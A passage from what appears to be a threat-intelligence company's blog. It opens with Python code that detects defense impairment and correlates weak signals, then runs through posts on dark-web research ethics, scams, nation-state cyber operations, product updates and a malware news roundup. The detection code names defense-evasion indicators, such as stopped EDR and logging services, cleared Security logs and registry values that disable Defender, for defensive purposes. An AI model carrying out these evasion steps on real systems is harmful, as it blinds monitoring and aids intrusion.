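            findings.append((e["host"], e["ts"], f"security service disabled: {e['service']}"))
        elif eid == 1102:
            findings.append((e["host"], e["ts"], "security event log cleared"))
        elif eid == 4719:
            findings.append((e["host"], e["ts"], "audit policy changed"))
    return findings


def hosts_with_clustered_findings(findings, min_count=2, window=timedelta(minutes=5)):
    """Hosts with >= min_count impairment findings inside one window: a single stopped
    service may be maintenance, several in a row looks like staging for a payload."""
    by_host = defaultdict(list)
    for host, ts, _ in findings:
        by_host[host].append(datetime.fromisoformat(ts))
    clustered = set()
    for host, times in by_host.items():
        times.sort()
        for i, t0 in enumerate(times):
            if sum(1 for t in times[i:] if t - t0 <= window) >= min_count:
                clustered.add(host)
                break
    return clustered


def dark_sensors(heartbeats, last_seen, now=NOW, max_gap=timedelta(minutes=30)):
    """Hosts still active on the network whose sensor has not reported within max_gap.
    A host whose network activity also stopped is offline, not dark, and is skipped."""
    dark = []
    for host, hb in heartbeats.items():
        hb_t = datetime.fromisoformat(hb)
        seen_t = datetime.fromisoformat(last_seen[host])
        if now - hb_t > max_gap and now - seen_t <= max_gap:
            dark.append(host)
    return sorted(dark)


if __name__ == "__main__":
    findings = defense_impairment_findings(EVENTS)
    for f in findings:
        print(f)
    print("clustered:", hosts_with_clustered_findings(findings))
    print("dark sensors:", dark_sensors(HEARTBEATS, LAST_SEEN_ON_NETWORK))
```

On the constructed data WS-0142 shows up twice, once for the cluster of stop/disable/log-clear events and again because its agent stopped reporting while the host kept talking on the network, which is the combination worth treating as an alert rather than an inconvenience; WS-0300 is silent on both feeds and is therefore just powered off.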

Not all early signals originate inside your environment.

Compromised credentials, exposed API keys, and proprietary data often appear on underground forums and marketplaces before being weaponized at scale. Proactive darknet monitoring can identify leaked corporate emails, password dumps, and access listings tied to your organization.

Routinely monitor for credential exposure, and enforce password resets and token revocation when compromise is suspected.

External signals can provide a critical time advantage.

Security telemetry is critical. So is human intuition.

Sometimes employees notice:

  • Suspicious emails that somehow bypassed filters
  • Files appearing in a shared drive that no one claims ownership of
  • Systems behaving slower or differently than usual

Encourage reporting without penalty. The 2024 Verizon DBIR emphasizes that human reporting remains a key detection source for many incidents.

If your culture discourages raising small concerns, you will only hear about problems when it is too late.

Attackers operate in stages. Initial access. Persistence. Privilege escalation. Lateral movement. Exfiltration. Impact.

Each and every stage generates signals.

Organizations that wait for definitive proof of compromise are often responding during the Impact phase. At that point, containment becomes expensive and public.

Early warning detection shifts the timeline left.

It creates opportunities to:

  • Reset credentials before privilege escalation
  • Isolate endpoints before ransomware deployment
  • Revoke tokens before data exfiltration

The financial implications are significant. IBM reports that organizations that identified and contained breaches under 200 days save substantially compared to those with longer dwell times.

Speed matters. However, speed cannot increase without signal recognition.

Recognizing early indicators is not about being paranoid. It is about pattern awareness and pattern detection.

Practical steps include:

  • Baseline normal behaviors across identity, network, and endpoint telemetry
  • Correlate weak signals across multiple control layers
  • Treat identity anomalies as high priority events
  • Integrate darknet monitoring into threat intelligence workflows
  • Encourage user reporting and close the feedback loop
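The Impair Defenses warning signals, the darknet credential-exposure signals, and the practical steps just listed (baseline, correlate weak signals across layers, prioritize identity anomalies) can be combined into a single correlator. The following is an added example, not DarkOwl code; the event records, the security-service list, the registry value names, the weights and the alert threshold are constructed assumptions to be tuned per environment.

```python
"""Weak-signal correlator across endpoint, identity and external layers.

Added example, not DarkOwl code. Event records, the security-service list,
registry value names, weights and threshold are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Services whose stop or removal maps to ATT&CK Impair Defenses (T1562).
# WinDefend, Sense, EventLog and Sysmon64 are real Windows service names;
# EDRAgent is a placeholder for a third-party EDR service.
SECURITY_SERVICES = {"WinDefend", "Sense", "EventLog", "Sysmon64", "EDRAgent"}

# Defender registry values whose change weakens the endpoint's posture.
DEFENSE_REGISTRY_VALUES = {"DisableRealtimeMonitoring", "DisableAntiSpyware"}

# Signals that by themselves mean "telemetry went dark": always alert.
IMPAIR_DEFENSES = {"security_service_stopped", "audit_log_cleared",
                   "defense_registry_change"}

# Per-signal weights (constructed); one weak signal never crosses ALERT_SCORE.
WEIGHTS = {
    "credential_exposed": 3,          # external: darknet monitoring hit
    "login_new_country": 3,           # identity: login from an unseen country
    "mfa_fatigue": 4,                 # identity: burst of MFA push prompts
    "security_service_stopped": 5,    # endpoint: EDR/logging service stopped
    "audit_log_cleared": 5,           # endpoint: Security log cleared (EID 1102)
    "defense_registry_change": 4,     # endpoint: Defender disabled via registry
}
ALERT_SCORE = 8          # correlated-alert threshold (constructed)
WINDOW = timedelta(hours=24)

# Constructed sample telemetry; "user" is the principal the event concerns.
SAMPLE_EVENTS = [
    {"ts": "2026-03-01T02:10:00", "layer": "external", "user": "jdoe",
     "host": None, "kind": "credential_exposed", "detail": "combo list"},
    {"ts": "2026-03-01T08:30:00", "layer": "identity", "user": "jdoe",
     "host": None, "kind": "login_new_country", "detail": "BR"},
    {"ts": "2026-03-01T08:42:00", "layer": "endpoint", "user": "jdoe",
     "host": "WS-042", "kind": "service_stopped", "detail": "EDRAgent"},
    {"ts": "2026-03-01T08:43:00", "layer": "endpoint", "user": "jdoe",
     "host": "WS-042", "kind": "audit_log_cleared", "detail": "Security"},
    {"ts": "2026-03-01T09:00:00", "layer": "endpoint", "user": "asmith",
     "host": "WS-117", "kind": "service_stopped", "detail": "Spooler"},
    {"ts": "2026-03-01T10:00:00", "layer": "identity", "user": "asmith",
     "host": None, "kind": "login_new_country", "detail": "CA"},
    {"ts": "2026-03-02T13:05:00", "layer": "endpoint", "user": "bwong",
     "host": "WS-203", "kind": "registry_set",
     "detail": "DisableRealtimeMonitoring"},
]


def classify(event):
    """Map a raw event to a weighted signal name, or None if it carries no weight."""
    kind, detail = event["kind"], event.get("detail")
    if kind == "service_stopped":
        return "security_service_stopped" if detail in SECURITY_SERVICES else None
    if kind == "registry_set":
        return "defense_registry_change" if detail in DEFENSE_REGISTRY_VALUES else None
    return kind if kind in WEIGHTS else None


def correlate(events):
    """Return one alert per user whose signals, inside a 24h window, either
    cross ALERT_SCORE across at least two layers or include an impair-defenses
    signal (telemetry going dark is an alert on its own)."""
    per_user = defaultdict(list)
    for ev in events:
        name = classify(ev)
        if name is not None:
            per_user[ev["user"]].append(
                (datetime.fromisoformat(ev["ts"]), ev["layer"], name, ev["host"]))

    alerts = []
    for user, signals in per_user.items():
        signals.sort(key=lambda s: s[0])
        for i, (start, _, _, _) in enumerate(signals):
            window = [s for s in signals[i:] if s[0] - start <= WINDOW]
            score = sum(WEIGHTS[s[2]] for s in window)
            layers = sorted({s[1] for s in window})
            names = [s[2] for s in window]
            if score >= ALERT_SCORE and len(layers) >= 2:
                reason = "correlated"
            elif IMPAIR_DEFENSES & set(names):
                reason = "impair_defenses"
            else:
                continue
            alerts.append({"user": user, "reason": reason, "score": score,
                           "layers": layers, "signals": names,
                           "hosts": sorted({s[3] for s in window if s[3]})})
            break  # first qualifying window per user is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

In the sample data, jdoe only alerts because the darknet hit, the identity anomaly and the endpoint events are read together; bwong alerts on the registry change alone, and asmith's single identity anomaly stays below the threshold.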

You will never be able to eliminate all risks. The goal is to reduce attackers’ dwell time.

Cyberattacks rarely occur unannounced. The warnings are just whispers, not shouts.

Organizations need to learn to listen to those whispers and how to act before they become a crisis.


Ethical Dilemmas in Dark Web Research

February 24, 2026

Dark web research remains a difficult domain. It is essential for uncovering illicit activity, yet fraught with ethical, operational, and legal complications. Unlike traditional threat intelligence work, dark web investigations often require some level of immersion in communities built on illicit activity, and therefore require their own set of rules and practices.

While DarkOwl Vision allows researchers to safely search and monitor the dark web without embarking on these complications, it is important to understand the ethical and legal best practices, which guidelines need to be followed, and which ones DarkOwl analysts follow.

This blog explores the key ethical and legal tensions, maps them against the DOJ’s (Department of Justice) guidance, and offers practical considerations for responsible dark web research.

In February 2020, the DOJ’s Cybersecurity Unit released a guidance document titled Legal Considerations when Gathering Online Cyber Threat Intelligence and Purchasing Data from Illicit Sources.

This is the guidance with which dark web research and interactions in the US should comply. The guidance is aimed at companies and security firms that engage in online threat intelligence gathering; this includes monitoring dark web forums and marketplaces, or purchasing data, malware, or exploit information offered in “dark markets.” The goal of the guidance is to help analysts assess their potential exposure under federal criminal law, both for the activities they participate in and for the purpose of their research. It particularly focuses on accessing, purchasing, or using illicitly obtained data.

However, the document is not legally binding, and it does not create rights or immunity from prosecution. Nor does it address every use case and activity: it explicitly does not purport to deal with every scenario (e.g., child-pornography forums or illicit drug markets may involve additional legal issues).

The guidance recommends that private actors who do more than “passive monitoring” (e.g., active communication, purchasing):

  1. create a written operational plan or “rules of engagement”
  2. keep records of how data is collected and used
  3. work with legal counsel before engaging in risky activities

Let’s explore some of the specific activities the guidance covers and what best practices should be.

According to the DOJ, passive monitoring of publicly accessible dark web forums or marketplaces (reading, collecting posts, observing patterns) “poses little risk of federal criminal liability,” provided the researcher does not exploit vulnerabilities or misuse credentials.

Best practice: still maintain documentation — e.g., record what tools you used (crawler, VPN, etc.), what forums you monitored, timestamps, and your research purpose. DarkOwl Vision does this for you, so you don’t have to.

Per DOJ guidance, active communication, use of unauthorized credentials (stolen credentials), or purchase of stolen data or malware can trigger liability under federal statutes. Therefore, any of these actions need to be undertaken with extreme caution and legal advice. While researchers can create fake personas, or sock puppets, they cannot use third-party or stolen credentials to access sites. Creating sock puppets does not guarantee immunity and should be done in compliance with company policy and with documentation of what was created and for what.

Purchasing data is a very risky area; you must have proper legal authorization in place before purchasing any data. This should only be done in a “defensive” way, for example buying back your own data. Even then, you must be able to evidence that there is no criminal intent and document the reason for purchasing the data. Legal review is essential, as is clear and thorough documentation.

This is not just a legal matter, however. Ethically we want to ensure that we are not supporting the criminal ecosystem by providing funds to threat actors that could be used for further attacks in the future. This is why DarkOwl never buys data.

If analysts need to interact directly on the dark web, the following practices are recommended:

  • Passive monitoring only (no purchases, no unauthorized credentials)
  • Maintain written operational plan and rules of engagement
  • Keep full logs and records of activity (what, when, why)
  • Seek legal counsel before any active engagement (purchase, communication, exploit use)
  • Minimize or avoid storing sensitive/stolen data; prefer metadata or anonymized indicators
  • If publishing, treat attribution as probabilistic; avoid definitive claims without strong evidence
  • Avoid methodologies that exploit vulnerabilities or unauthorized access to private systems/services

With the release of DOJ’s 2020 guidance, dark web research is no longer a completely lawless frontier for private researchers — but neither is it risk-free or ethically trivial. The guidance provides a valuable baseline for lawful behavior, but it should be treated as a floor, not a ceiling. Ethical, responsible research demands transparent documentation, strict adherence to “least-impact” principles (passive monitoring, data minimization), and legal review before engaging in higher-risk activities.


DarkOwl is the leader in darknet data. Contact us to learn how we can help with your research and monitoring.

Difference Between Information Security and Cybersecurity

February 18, 2026

In an era of data breaches and constant headlines focused on “security” topics, “security” has become a catch-all term. While the terms cybersecurity and information security are often used interchangeably, it is important to acknowledge that they focus on different areas – they are related, but their scope differs. In this blog, we will explore how they differ in scope, focus, and application.

To start, information security (infosec) can be thought of as an umbrella term, while cybersecurity is a specialization underneath that umbrella. Using the terms interchangeably can lead to gaps in your defense strategy as cyber security focuses on the digital realm, while information security protects data in all forms.

Information Security

Information Security is the broad practice of protecting information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction. This includes both data in the digital realm, as well as physical data (think of a file on your computer and a file in your filing cabinet). The goal of information security is to protect the CIA Triad (note that since cybersecurity is a subset of information security, these goals align to cybersecurity as well – the scope is just more specific). The CIA Triad stands for confidentiality, integrity, and availability:

  • Confidentiality: is your sensitive information only accessible to those authorized to see it?
    • Common Threats: phishing, man in the middle attacks, human error
  • Integrity: is your data authentic, accurate, and reliable?
    • Common Threats: man in the middle attacks, human error, malware, hardware/software glitches
  • Availability: are the systems, networks, and data up and running whenever authorized users need them?
    • Common Threats: distributed denial of service attacks, hardware failure, ransomware, natural disaster

Examples of information security would be the practice of shredding sensitive paper documents, office keycard systems, and encryption policies. Threats against strong information security include theft, natural disasters, and physical breaches.

Cybersecurity

Cybersecurity is the practice of defending computers, servers, mobile devices, electronic systems, networks, and data from malicious digital attacks. If it involves the internet or a digital network, it’s cybersecurity. In the example above, cybersecurity covers the data in the digital realm – a file on your computer (and the systems, networks, and hardware that house it). The goal in cybersecurity is to protect against cyber attacks – hacking, malware, phishing – to name a few. Examples of cybersecurity would be firewalls, antivirus software, and securing “Internet of Things” (IoT) devices. Cybersecurity threats include cyber warfare, hacking, and data breaches.

Security is a holistic culture, not just a software update. Information security and cybersecurity work together in creating overlapping layers of defense. You cannot have a robust security policy without incorporating both the physical and the digital layers of defense, and policies covering both.

For example, infosec would set the overall policy of protecting and encrypting data (a business-level decision based on risk), while the cybersecurity division would implement the technology to do so (firewalls, encryption, multi-factor authentication, etc.). In a situation where a breach or attack does happen, the two have distinct roles but cannot be successful without each other:

  • Information Security
    • Determines the data that was stolen
    • Manages the legal and regulatory fallout (GDPR/HIPAA notifications)
    • Initiates the Business Continuity Plan to ensure the company stays operational during the cleanup
  • Cybersecurity
    • Identifies the threat details
    • Isolates the issue and stops it from continuing
    • Patches the vulnerability that the hacker used

In short, cybersecurity handles the threats (hackers, viruses, bots) while information security handles the risks (legal compliance, physical safety, data integrity).

With so many of us working from home, it is important to practice good daily security hygiene to make sure that not only the digital data of your company is safe, but potential physical risks are minimized as well. Below is a checklist covering the digital and physical bases to ensure your data stays private and your hardware stays safe:

Digital Checklist (Cybersecurity):

Protect your devices and network from remote attacks.

  • Secure the Router:
    • Change the default admin password
    • Enable WPA3 (or WPA2-AES) encryption
    • Turn off WPS (Wi-Fi Protected Setup)
  • Segment Your Wi-Fi:
    • Set up a “Guest Network” specifically for your work laptop
      • This keeps your work data separate from “unsecure” items like an Amazon Alexa or gaming console
  • Enable MFA/2FA:
    • Use an authenticator app (like Google Authenticator or Authy) on every account
  • Automate Updates:
    • Set your OS (Operating System) and browser to “Auto-Update” so you get security patches immediately
  • VPN for Public Use:
    • Use a reputable VPN to create an encrypted “tunnel” for your data

InfoSec Checklist:

Protect the physical environment and the data itself.

  • Full Disk Encryption:
    • Ensure BitLocker (Windows) or FileVault (Mac) is on
  • The “Clear Desk” Policy:
    • Don’t leave passwords on sticky notes
    • Shred any documents containing client names, addresses, or account numbers before throwing them away
  • Visual Privacy:
    • Use a privacy screen filter on your monitor
  • Secure Backup (3-2-1 Rule):
    • Keep 3 copies of your data:
      • 2 different types of media (laptop and an external drive)
      • 1 copy stored off-site (encrypted cloud storage like Backblaze or iCloud)
  • Webcam Cover:
    • A physical slide cover for your camera is the only 100% guarantee against “camfecting”
  • Lock your computer when you step away

Valentine’s Day Scams

February 12, 2026

Love is in the air and unfortunately, so are scams. With Valentine’s Day on the horizon, cybercriminals are preparing to exploit unsuspecting victims through a variety of deceptive tactics. Emotional vulnerability and digital trust often make this season especially appealing to scammers.

While threat actors continue to rely on familiar scams, this holiday uniquely lends itself to romance-based schemes. As people become more open to meeting and connecting with strangers online, cybercriminals gain new opportunities to exploit unsuspecting victims. The following provides an overview of prevalent scams and guidance on how consumers can protect themselves during the season of love.

Romance scams are designed to exploit emotions before finances. In these schemes, criminals deliberately build affection and trust with their victims to gain access to money or sensitive personal identifying information (PII). Scammers typically seek out targets on dating apps, social media platforms, and singles websites, often posing as someone they are not. Using a carefully crafted fake persona, they engage in tactics such as “love bombing,” overwhelming the victim with attention and affection to quickly create an emotional bond. Once trust is firmly established, the scammer begins to request money or financial help, frequently citing urgent or fabricated emergency situations.

Romance scams and other confidence schemes account for some of the highest financial losses among Internet-facilitated crimes. Data from the FBI’s Internet Crime Complaint Center indicate that in 2023, the most recent year for which statistics are available, approximately 18,000 victims reported losses totaling nearly $700 million.

How to Protect Yourself:

  • Research an individual’s profile and photos using open-source information techniques.
  • Proceed with caution when asked to send money. Never send money to anyone you have communicated with solely online.
  • Be wary of someone who declares love very quickly, tries to isolate you, or becomes evasive when discussing meeting in person.

Like many fraudulent retail websites, fake floral sites are used by scammers to deceive consumers, particularly during holidays when demand for floral arrangements is high. These sites will capitalize on individuals making last minute purchases by mimicking legitimate sites and luring unsuspecting shoppers. To enhance their credibility, they frequently run fake social media ads that direct victims to counterfeit pages, adding a false sense of legitimacy to the scam.

Victims have reported that some sites will fulfill the order, but the quality is lacking or the items arrive damaged, while other victims claim the flowers were never delivered and the shop became unreachable.

How to Protect Yourself:

  • Double check website URLs.
  • Examine reviews on the website to see possible complaints from victims or unsatisfied customers.
  • If possible, use secure payment methods that offer fraud protection.

As with fake websites, scammers use a variety of tactics to deceive individuals into purchasing counterfeit tickets. Scammers exploit the high demand and limited supply of live events by creating fake ticketing websites with legitimate-sounding names, advertising fraudulent tickets on social media marketplaces, and even offering “last-minute deals” outside event venues. These scams are often tied to genuine events taking place in the area, making them appear more credible and increasing the probability that unsuspecting buyers will be fooled.

The likelihood of falling for these scams rises when purchases are delayed until the last minute. Scammers are aware that urgency and stress can cloud judgment, making individuals more vulnerable during rushed situations.

How to Protect Yourself:

  • Purchase tickets from official sources.
  • Verify the legitimacy of the event prior to purchase.
  • Avoid purchases that require uncommon payment types.

In 2023, Check Point researchers claimed 1 in every 1,000 Valentine’s Day emails was found to be malicious or suspicious. Cybercriminals are skilled at creating enticing emails, messages, or social media posts that appear to come from a secret admirer or a long-lost love interest. These messages often feature subject lines such as “A Valentine’s Day Surprise for You” or “Someone Has a Crush on You.” Their purpose is to entice unsuspecting recipients into clicking malicious links or downloading infected attachments.

These scams can also include fake e-card messages and online shopping deals. Be aware of email ads promoting flowers, chocolates, and romantic getaways. The emails typically contain links to malicious sites that steal personal information and can infect your device with malware.

How To Protect Yourself:

  • Ensure the sender has a trusted email address, showing the correct domain.
  • Trust your instincts if the message seems “off” and possibly written by AI.
  • Use trusted websites for all online shopping and double check website URLs for any odd variations.

Cybercriminals demonstrate a strong capacity to exploit emotions, while scam tactics continue to evolve in sophistication. Research shows that new domains with ‘Love’ or ‘Valentine’ in their names more than double in January compared to the year-end months. Excluding consumer losses, romance scams have accounted for hundreds of millions of dollars in losses each year, with the total increasing annually.

While Valentine’s Day celebrates love, cybercriminals unfortunately see it as an opportunity to exploit unsuspecting victims. As always, it’s important to remain vigilant during any online activity, especially when shopping for the perfect gift or planning a romantic experience.


To see specific examples and screenshots from the dark web, check out our blog from last year.

Prepping The Battlefield – The New Cyber Warfare Playbook

February 10, 2026

Warfare has always gone hand in hand with technological innovation. Nuclear energy followed the nuclear bomb, nearly a decade after the first atomic weapon was detonated. Before the World Wide Web, there was ARPANET, launched in 1969 by the U.S. Department of Defense to connect military and research installations through distributed computer networks, more than 20 years before the internet became public. Before commercial GPS, there was NAVSTAR, a U.S. military satellite program developed in the 1970s, originally designed for missile guidance, troop movements, and precision targeting—years before civilian GPS became available. Military jet engines preceded commercial aviation, military radar predated modern weather forecasting, military encryption existed long before public cryptography and e-commerce, and drones, satellites, and even mass-produced antibiotics were first developed to meet battlefield demands.

Once again, militaries are leveraging technology to redefine tactics and battlefield strategies. Nation-states are increasingly developing offensive cyber capabilities not merely as tools, but as a means to prepare and shape the battlespace before military action occurs. Power grids, communications infrastructure, air defenses, satellites, psychological, and command-and-control systems are now targeted before the first kinetic shots in anger.

In this blog, we’ll review some of the most impactful nation-state offensive cyber operations in the modern era and how they illustrate this escalating trend of warfare.

Eleven years after Operation Orchard, Israel admitted it was responsible for an airstrike in Syria that targeted a suspected nuclear reactor which may have been capable of producing nuclear weapons material. No jets were shot down during the operation and no surface-to-air defense missiles were launched by the Syrian military. In other words, Israel entered Syrian airspace without resistance.

According to multiple sources, the failure of Syrian air defenses during the 2007 strike has been attributed to a proactive Israeli cyber and electronic warfare operation that temporarily disabled radar and surface-to-air missile systems. Although specific methods were never publicly disclosed, analysts have speculated that the operation may have involved advanced electronic jamming and a software capability known as Suter.

Suter, reportedly deployed aboard specialized aircraft, is believed to exploit radar and air-defense systems by detecting their emissions and injecting malicious signals back into the emitters. This can result in disrupted sensor feeds, conflicting or false target data, and, in some cases, complete loss of radar functionality, effectively rendering the air-defense network inoperable during the operation.

One day before Russian military units entered Georgia in 2008, there were widespread cyberattacks targeting local media as well as government websites. These attacks were primarily distributed denial of service (DDoS) and website defacements. Although less sophisticated than other types of nation-state cyber operations, these attacks aimed to isolate and silence both Georgian officials and the civilian population.

With government services offline, it became difficult for state officials to communicate and respond to the events that would take place the following day. And when local media was unable to broadcast, it too could not communicate to the public the impact of Russia’s invasion of their homeland. This strategic DDoS attack caused confusion and made disinformation more potent as Russia continued to take control of Georgian territory.

The next phase of the cyber operation broadened the scope and targeted financial services, institutions, and even launched anti-Georgian hacktivist websites to stir discontent and make civilian resistance to the Russian operation less attractive.

There is ongoing debate among experts regarding the strategic significance of cyber operations during Russia’s 2014 annexation of Crimea. While offensive cyber activity was present during and intensified after the invasion, it is difficult to argue that these operations played a decisive role in enabling Russia’s territorial gains or directly shaping battlefield outcomes for Russian forces on the ground.

More impactful cyber operations emerged after the annexation. The Sandworm campaign stands out as one of the most consequential post-Crimea cyber efforts, causing extensive disruption to Ukrainian networks and, in later operations, contributing to widespread power outages. Other destructive campaigns, including wiper-style malware such as NotPetya, similarly targeted Ukrainian institutions and critical infrastructure in the years following 2014, reinforcing cyber operations as a persistent element of Russia’s broader pressure campaign rather than a decisive pre-invasion enabler.

By February 2022, it had become clear that Russian military strategists believed their prior cyber operations were worth leveraging again in the lead-up to a full-scale invasion of Ukraine. Many of the same cyber tactics observed in previous years were redeployed days—or even hours—before Russian troops crossed the Ukrainian border.

In the days preceding the invasion, WhisperGate targeted Ukrainian government websites and servers. Disguised as traditional ransomware, WhisperGate was in fact wiper malware designed to destroy data and render systems inoperable. Shortly thereafter, coordinated DDoS attacks disrupted Ukrainian banks and temporarily took multiple government websites offline.

Just hours before the ground invasion commenced, a synchronized campaign deploying HermeticWiper and IsaacWiper further targeted Ukrainian government networks with wiper malware. These attacks appeared aimed at degrading communications, slowing coordination, and complicating defensive responses.

As wiper malware was overwriting disks across Ukraine, a separate cyberattack targeted satellite communications infrastructure. Ukraine’s Viasat KA-SAT connectivity was taken down, disrupting satellite links used by civilian networks as well as certain Ukrainian military assets. This attack demonstrated a deliberate effort to impair command, control, and situational awareness at the critical opening phase of the invasion.

The recent operation in Caracas demonstrates the capabilities that emerge when cyber warfare is integrated with real-world troops in combat. Although few details, means, or methods have been made public, there is still a significant amount of evidence highlighting the impact the United States Cyber Command made during Operation Absolute Resolve.

According to American officials, cyberweapons were used in Venezuela to disable power in regions near military bases in Caracas, as well as to shut down radar defense systems and even handheld radios used by the Venezuelan military (see image below). Unverified reports from soldiers and security personnel in Caracas claim to have experienced “intense sound waves, severe physical distress, and bleeding during the operation”. United States President Trump spoke to NewsNation after the operation and stated that a “sonic weapon” had been used during the raid.

Modern warfare is no longer defined solely by armies, aircraft, and armor. As history has repeatedly shown, military necessity drives technological innovation, often before those capabilities reach the civilian world. Today, offensive cyber operations represent the latest evolution of this pattern—an invisible means of shaping conflict before the first kinetic action occurs.

The cases examined in this blog demonstrate a clear trend: nation-states now treat cyberspace as a domain of warfare. From Israel’s alleged disabling of Syrian air defenses during Operation Orchard, to Russia’s coordinated cyber disruptions preceding invasions of Georgia and Ukraine, cyber operations are used to blind sensors, sever communications, disrupt civilian infrastructure, and undermine public trust. These actions are not isolated technical events; they are strategically timed efforts designed to degrade an adversary’s ability to detect, decide, and respond under pressure.


Q4 2025: Product Updates and Highlights

February 04, 2026

As we have wrapped up Q4, we’re excited to share major updates to our DarkOwl Vision product suite. Below we highlight some of the most exciting feature updates and launches. These enhancements and net-new features reflect our commitment to providing continued value to our partners, clients, and the cybersecurity community. We look forward to what is in store in Q1 of 2026!

Understanding darknet marketplaces is critical for identifying emerging threats, monitoring illicit activity, and staying ahead of the evolving cyber‑risk landscape. DarkOwl’s Market Explore feature delivers an intuitive experience to dive deep into our enhanced darknet marketplace dataset. We now have 81 markets, with more than 387,651 listings and 16,225 vendors in our enhanced market listing DarkMart database.

At the top of the Market Explore page, you’ll find a set of visualizations that help you quickly understand: 

  • Overall listing volume and vendor activity 
  • Top shipping sources by listing count 
  • Darknet markets and vendors with the highest activity levels 

Selecting View Charts expands the charts into a full‑screen visualization experience, where you can explore trends like: 

  • Enhanced Markets by Topic 
  • New Listings Over Time 
  • Shipping Sources Across the Entire Dataset 

Each market’s Overview page provides a snapshot of marketplace activity: 

  • Total Listings: Unique listings available within our dataset 
  • Total & Top Vendors: Overall vendor count and top vendors ranked by listing volume 
  • Top Shipping Source: The region shipping the highest volume of listings 
  • New Listings Over Time: Daily/weekly/monthly visual trends 
  • Shipping Sources Map: Color‑coded visualization from highest volume to lowest 

Additional analyst‑curated information may include Market Descriptions, Currencies Accepted, Admin Handles, Contact Information (emails, Jabber servers, PGP keys). If a PGP key exists, users can reveal and copy it with a single click. You can also jump directly from the Overview into the Markets Research section to further investigate specific listings. 

Building on the launch of DarkOwl’s Enhanced Marketplace Research in Q3, the team added several Research features: support for Findings, Search Blocks, and Site Context. Additionally, we have completed currency normalization for prices in market listings, allowing for Sort by Price features. 

Search results from selected paste sources have a new look and improved searchability. Paste results (more than 40 million documents) are now eligible to be returned when you filter by Post Date or Username in both the Vision UI and the Vision API. If available, Paste Authors are shown at the top of a UI search result and include a pivot link, just like Forum Post Authors or Market Vendors.

We launched our Findings Export feature for Cases, allowing our users to bulk export important results out of Vision UI into Word, CSV, or JSON. It makes sharing reports and moving data out of Vision UI faster and easier. This was a top feature request from our customers and we are thrilled to have delivered on this ask! 

  • To more easily filter out noisy sites, or data leaks you’ve already seen, we’ve added an “Exclude this Source” option on the Vision UI search result table.
  • We added 9 new actors to our Actor database in Q4. Additionally, Actor Explore and Actor API now include associated Sites in the Darknet Fingerprint tab. 

Highlights 

Quarter after quarter, our data collection team continues to astonish us with the quantity of data made available across DarkOwl products. Let’s highlight just some of that growth:

  • 6% increase in credit card numbers
  • 2.5% increase in IPs
  • 5% increase in data leak records

When search results come from data leaks, users can review additional information curated by DarkOwl analysts, giving enrichment on the data leak. The descriptions below are all available in our Leak Explore UI feature or the Leak Context API endpoint.

Ryanair Internal Communications

Data purported to be from RYANAIR was posted on DarkForums, a hacking forum, on November 19, 2025. According to the post, the data breach includes email addresses, ticket bookings, travel details (departures, destinations), flight numbers, and ticket claimants. Data exposed includes names, email addresses, internal documents, company names, and internal emails.

IRAN IP NETWORK INFRASTRUCTURE

A post on DarkForums, a hacking forum, on August 22, 2025 linked to the file: iran-net-100k.json. According to the post, the “Caucasian Brotherhood” leaked a dataset of Iranian network information that included IP addresses, open ports, software versions, and DNS records. Data exposed includes countries, IP addresses, and locations.

Farm Credit Union Of Colorado Bank

Data purported to be from Farm Credit was posted on BreachForums, a hacking forum, on September 8, 2025. Data exposed includes names, customer information, physical addresses, online profiles and user identification number (UID).


Curious how these features and data can make your job easier? Get in touch!

Threat Intelligence RoundUp: January

February 02, 2026

Our analyst team shares a few articles each week in our email newsletter, which goes out every Thursday. Make sure to register! This blog highlights those articles in order of what was the most popular in our newsletter – what our readers found the most intriguing. Stay tuned for a recap every month. We hope sharing these resources and news articles emphasizes the importance of cybersecurity and sheds light on the latest in threat intelligence.

1. ‘Bad actor’ hijacks Apex Legends characters in live matches – BleepingComputer

Over the weekend of January 09, players of Apex Legends, a battle royale shooter game, reported game disruptions caused by threat actors hijacking characters, disconnecting users, and changing nicknames. Respawn, the publisher of the game, confirmed the security incident, stating that a “bad actor is able to control the inputs of another player remotely in Apex Legends”. The company does not believe the threat actors were able to install malware or execute code on players’ systems. Read full article.

2. 27 Malicious npm Packages Used as Phishing Infrastructure to Steal Login Credentials – The Hacker News

On December 23, 2025, the Socket Threat Research Team announced the discovery of a 5 month long spear-phishing operation that turned 27 npm packages “into durable hosting for browser-run lures that mimic document-sharing portals and Microsoft sign-in”. The campaign targeted 25 organizations across the U.S. and allied nations, focusing on manufacturing, industrial automation, plastics, and healthcare. Aimed at sales and commercial personnel, the operation repurposed npm and package CDNs “into durable hosting infrastructure, delivering client-side HTML and JavaScript lures that the threat actor embeds directly in phishing pages.” Following initial interaction, the script redirects the browser to threat-actor controlled infrastructure. Article here.

ReliaQuest’s Threat Research team has discovered a new phishing campaign using private messages to deliver malicious payloads with the intent to deploy a remote access trojan (RAT). The attack began with a message sent via LinkedIn that contained a “malicious WinRAR self-extracting archive”. Once opened, the archive extracts four components, including a decoy PDF named to match the victim’s industry. The final payload attempts to communicate with an external server that can grant persistent remote access. Read more here.

Recent activity shows the Chinese threat actor Silver Fox has begun using income tax themed lures to distribute ValleyRAT. The group has focused on Indian entities, using phishing emails containing decoy PDFs claiming to be from India’s Income Tax Department. Opening the attachment leads victims to download files that inject ValleyRAT into the system and communicate with external servers. Read here.

5. University of Hawaii Cancer Center hit by ransomware attack – BleepingComputer

In August 2025, the University of Hawaii’s (UH) Cancer Center was the victim of a ransomware attack in which participants’ data was stolen, including documents from the 1990s containing Social Security numbers. UH reported to the state legislature that threat actors broke into Cancer Center servers, “encrypted files related to a cancer study and demanded payment for a program to decrypt the files”. The breach targeted a specific research project and had no effect on clinical operations or patient care. Learn more.

6. North Korea-Linked Hackers Target Developers via Malicious VS Code Projects – The Hacker News

The Contagious Interview campaign, which has been linked to North Korean threat actors, has been observed leveraging malicious Microsoft Visual Studio Code (VS Code) projects to deploy a backdoor on compromised systems. First discovered in December 2025, the attack involves instructing targets to clone a repository “on GitHub, GitLab, or Bitbucket, and launch the project in VS Code as part of a supposed job assessment.” The goal is for the payload to run every time a file in the folder is opened, which eventually leads to deployment of malware such as BeaverTail and InvisibleFerret. Read full article.
